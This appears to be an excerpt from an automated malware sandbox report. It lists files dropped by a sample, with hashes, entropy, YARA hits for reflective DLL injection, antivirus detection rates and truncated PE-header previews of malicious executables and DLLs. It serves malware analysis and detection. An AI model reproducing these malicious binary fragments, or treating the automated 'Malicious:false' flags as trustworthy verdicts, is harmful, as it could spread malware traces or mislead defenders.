                                                                                                                                                                                                                                MD5:D01A59A25A54C9BFF55A43129BC83EF7
                                                                                                                                                                                                                                SHA1:3D8A80C8A83BB0200BEAEA7DF5C75308E906D4E2
                                                                                                                                                                                                                                SHA-256:78F7E8BFC48044D0E9806DA63391A33633DB330B6AFE0F89C0F3930336943696
                                                                                                                                                                                                                                SHA-512:CFE7F0D9BFD8DF6A804BC939AE1206C9A1E2A874AF8DCAC1ACDE8D80F257CBAE5707539AD5B2C22A1555F8076BE226E9EF9630C48D7D7D2FA1422D0C6470D22D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1248
                                                                                                                                                                                                                                Entropy (8bit):5.347863460191528
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoR1qE4jE4K5sXE4qdKm:MxHKXAHKzecYHKh3oPtHo6Z1qHjHKMHA
                                                                                                                                                                                                                                MD5:54A35BA0C52DAD92F72A95BF0D28B57C
                                                                                                                                                                                                                                SHA1:952FB1B41527E6899AFA00BAA14ADAED5D94DA4C
                                                                                                                                                                                                                                SHA-256:775EA2475D29721BAF6265B12E7B610D451E1A8E42A8B49BA2F73A693A848FF2
                                                                                                                                                                                                                                SHA-512:DCCE2FA4E7BC913FD40132B87D3D29DDCD4A2659EC7F84220EAF44E73032D452CDD64508816F8EE4AB4A32A6B9391D536E07F938F4EAB2ACB5CFB33314E956EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):739
                                                                                                                                                                                                                                Entropy (8bit):5.348505694476449
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaWzAbDLI4MNldKZat92n4M6:ML9E4KlKDE4KhKiKhBsXE4qdK284j
                                                                                                                                                                                                                                MD5:A65F13C4355387C4645D260206AE915F
                                                                                                                                                                                                                                SHA1:F8857636BB3B50E634E96E7B0ECE6AD77656BA5F
                                                                                                                                                                                                                                SHA-256:DB8CA2E253F03395ABECD812505666B3BD5CE699B798E3F624D22EE605FB290E
                                                                                                                                                                                                                                SHA-512:0584E8911FD08CC0BB833C6373AE5D161D00CF40FB4533B5DD0D31F38CF1783BB25E34084995A2D116AFB01ABAD14005D62EE51A1D9B79E262EF28775B878AB6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3293
                                                                                                                                                                                                                                Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q35VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                MD5:4ED743F7E1676539C322DAB36E328377
                                                                                                                                                                                                                                SHA1:AAD5F8C6DF7C8CEC18522B9E572721A71F5182F3
                                                                                                                                                                                                                                SHA-256:EBEEE88F4A11C2DB02A1AC83F7CF00BEADB70CF23670DA29487B6543A1EDCB00
                                                                                                                                                                                                                                SHA-512:024E50C28044329DCEB38B02C7874F7FDB43FB84156E5C32ED8966F0682FFBA48A159D2DE96ADE52C33B5D3364612A9D1E16714B00944C18CD82D60F4479CADF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1248
                                                                                                                                                                                                                                Entropy (8bit):5.347863460191528
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoR1qE4jE4K5sXE4qdKm:MxHKXAHKzecYHKh3oPtHo6Z1qHjHKMHA
                                                                                                                                                                                                                                MD5:54A35BA0C52DAD92F72A95BF0D28B57C
                                                                                                                                                                                                                                SHA1:952FB1B41527E6899AFA00BAA14ADAED5D94DA4C
                                                                                                                                                                                                                                SHA-256:775EA2475D29721BAF6265B12E7B610D451E1A8E42A8B49BA2F73A693A848FF2
                                                                                                                                                                                                                                SHA-512:DCCE2FA4E7BC913FD40132B87D3D29DDCD4A2659EC7F84220EAF44E73032D452CDD64508816F8EE4AB4A32A6B9391D536E07F938F4EAB2ACB5CFB33314E956EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106000
                                                                                                                                                                                                                                Entropy (8bit):4.022282363957134
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:VcFioDKjdkbG8fvwU7jk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypXg:PJk/nSOe91z7NfphMiNG7nU1FY+KPZGt
                                                                                                                                                                                                                                MD5:3F6F00ACED1999AAEFAF2084F923E5DF
                                                                                                                                                                                                                                SHA1:21BB5A0565612F4DD5DECC44D8DEB17C97F9C7CE
                                                                                                                                                                                                                                SHA-256:9A04C272FBEC461622FBBDD2DCDE8936F9BE1670D8BD1B857287417465998CE2
                                                                                                                                                                                                                                SHA-512:656E7A0595E662E3057FA4009EB4532CFFFC587E29F7ABCED4C0A5E77D1C8B4E4A9253A2290D3D7357EF711C218F48D9B745E739695E6CC896C4891BEAD32EC2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):104128
                                                                                                                                                                                                                                Entropy (8bit):4.032117701154245
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:k+cF1X5kGGC03AN3jk0VqVY3sbEBNjZLNMSJtVKTxK4z3nR1vYPWppc1mHfypgkn:kNki0wmVmoEvQD8hciVGFnIwFkKFDo
                                                                                                                                                                                                                                MD5:CE076D8303C370AE939C56B9D2037315
                                                                                                                                                                                                                                SHA1:AA3AB8A445CA8230380EF2419A627E4689E4D701
                                                                                                                                                                                                                                SHA-256:2C85D864412BA5DB94B0A347A2554C428A19EF283B10CF91666B5F2A1DCB0FBB
                                                                                                                                                                                                                                SHA-512:CE2BFD8B19CDD9B1A6699883C3C160170C1F775119C67A8151A18109A02D64E36F32D86F9DA40F2B258267E9CE24A6846167109B0229BF590A454FB7C1156F7A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:....h... ...............P...............Y......^... ..............h...W.......e.n.-.C.H.;.e.n.-.G.B...............@..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106000
                                                                                                                                                                                                                                Entropy (8bit):4.022282363957134
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:VcFioDKjdkbG8fvwU7jk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypXg:PJk/nSOe91z7NfphMiNG7nU1FY+KPZGt
                                                                                                                                                                                                                                MD5:3F6F00ACED1999AAEFAF2084F923E5DF
                                                                                                                                                                                                                                SHA1:21BB5A0565612F4DD5DECC44D8DEB17C97F9C7CE
                                                                                                                                                                                                                                SHA-256:9A04C272FBEC461622FBBDD2DCDE8936F9BE1670D8BD1B857287417465998CE2
                                                                                                                                                                                                                                SHA-512:656E7A0595E662E3057FA4009EB4532CFFFC587E29F7ABCED4C0A5E77D1C8B4E4A9253A2290D3D7357EF711C218F48D9B745E739695E6CC896C4891BEAD32EC2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):225310
                                                                                                                                                                                                                                Entropy (8bit):6.053295654393721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
                                                                                                                                                                                                                                MD5:A4623D0552D87941FBEFBE7133262D15
                                                                                                                                                                                                                                SHA1:74080A949DA104FDAB34E2A9350B924E07C08C14
                                                                                                                                                                                                                                SHA-256:8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
                                                                                                                                                                                                                                SHA-512:4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):88576
                                                                                                                                                                                                                                Entropy (8bit):5.759468727856401
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:FwbKHmgTHUCEU3arJLgGYIkaY9a3nHxs+FhKek5:qb9gTHUCEUKrJqMYqRs+FhKes
                                                                                                                                                                                                                                MD5:44BBCCD626DA8B8CB487E360334E1D07
                                                                                                                                                                                                                                SHA1:1EE19B38C0DA64B550BD6E4D79B3753DB89025C9
                                                                                                                                                                                                                                SHA-256:2F9B60E849EAA271EE6AB551BEA892AE06F4D7D7157AA9343700E14A1E897822
                                                                                                                                                                                                                                SHA-512:5DCD1C5B985515363BDC705F31DB500371C05032ECA501F0707C147B04543D567EB5FD10E896F56B63111F8FCC5DB28C44AB521409FDA9F7643D888AC4B6FAD5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 50%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.,..nB..nB..nB..nC.nB......nB......nB....&nB....TnB.....nB.%....nB.%....nB.%....nB.Rich.nB.........PE..d.....af.........." .................4....................................................`......................................... 2..W....&..x...............................L...................................`...p...............H............................text...o........................... ..`.rdata..wb.......d..................@..@.data...p<...@.......&..............@....pdata...............@..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):270848
                                                                                                                                                                                                                                Entropy (8bit):6.112502411451738
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:ezzdp8LAcykTpwOC6aTUO77nYXzTI7KUh6VDN/7PLj/n:ozdpukkTBUvohh/7/
                                                                                                                                                                                                                                MD5:B59AE63E24F82DB7C43975D39496FB4A
                                                                                                                                                                                                                                SHA1:6B6B3516FDA1AEC00499FE21CBFB53F81B47B372
                                                                                                                                                                                                                                SHA-256:E5C2B8A9F0EE49CB3C934B94D2F4F18BA01FB46EE91A054399AA045F5D66D201
                                                                                                                                                                                                                                SHA-512:0DDACF3F938E0C46A72969B30EC329EF8F649C39D5A72EE66184701DD0EC9F423D503A16A8860EE89B69A5409C2432A8A9CAF43A393433C8154ED9CA42201995
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 55%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............tZ..tZ..tZ..uZ..tZE..Z..tZ}o.Z..tZ}o.Z..tZ}o.Z..tZ.l.Z..tZ.l.Z..tZ.l.Z..tZ.l.Z..tZ.l.Z..tZRich..tZ................PE..d....?.f.........." ................p.....................................................`............................................S...$...(................0...................................................m..p...............@............................text...<........................... ..`.rdata..C...........................@..@.data............(..................@....pdata...0.......2..................@..@.rsrc...............................@..@.reloc..d ......."..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):238080
                                                                                                                                                                                                                                Entropy (8bit):5.990664364126582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
                                                                                                                                                                                                                                MD5:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                SHA1:067C1B809106A1B9AD1641A9C745D4B83ECE1196
                                                                                                                                                                                                                                SHA-256:91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
                                                                                                                                                                                                                                SHA-512:1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                Entropy (8bit):5.38453362821494
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:3HWSKco4KmZjKbmOIld6emZ9tYs4RPQoUGt/NK3R8e9ia4:3WSU4xym/jmZ9tz4RIoUeNWR82m
                                                                                                                                                                                                                                MD5:13B7FA9E1F857C2D4A4DEB31FF59056F
                                                                                                                                                                                                                                SHA1:A9100FCCA4B31DCE5CAF369C137691BB2E4E4C48
                                                                                                                                                                                                                                SHA-256:1758F330E863356AA9AD0CBA1CC2A75B0753CC82A8D06C20F14A2F558A20EC76
                                                                                                                                                                                                                                SHA-512:FAB1F561B23552DD333E52F78340475289CE35FFF4E8A4D4477DBD4374410B6719C6EB0342FFF5631402E742031D779DA9F4562891CC2D1D4A99FA50A48C28D6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:@...e.................................~..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):238080
                                                                                                                                                                                                                                Entropy (8bit):5.990664364126582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
                                                                                                                                                                                                                                MD5:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                SHA1:067C1B809106A1B9AD1641A9C745D4B83ECE1196
                                                                                                                                                                                                                                SHA-256:91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
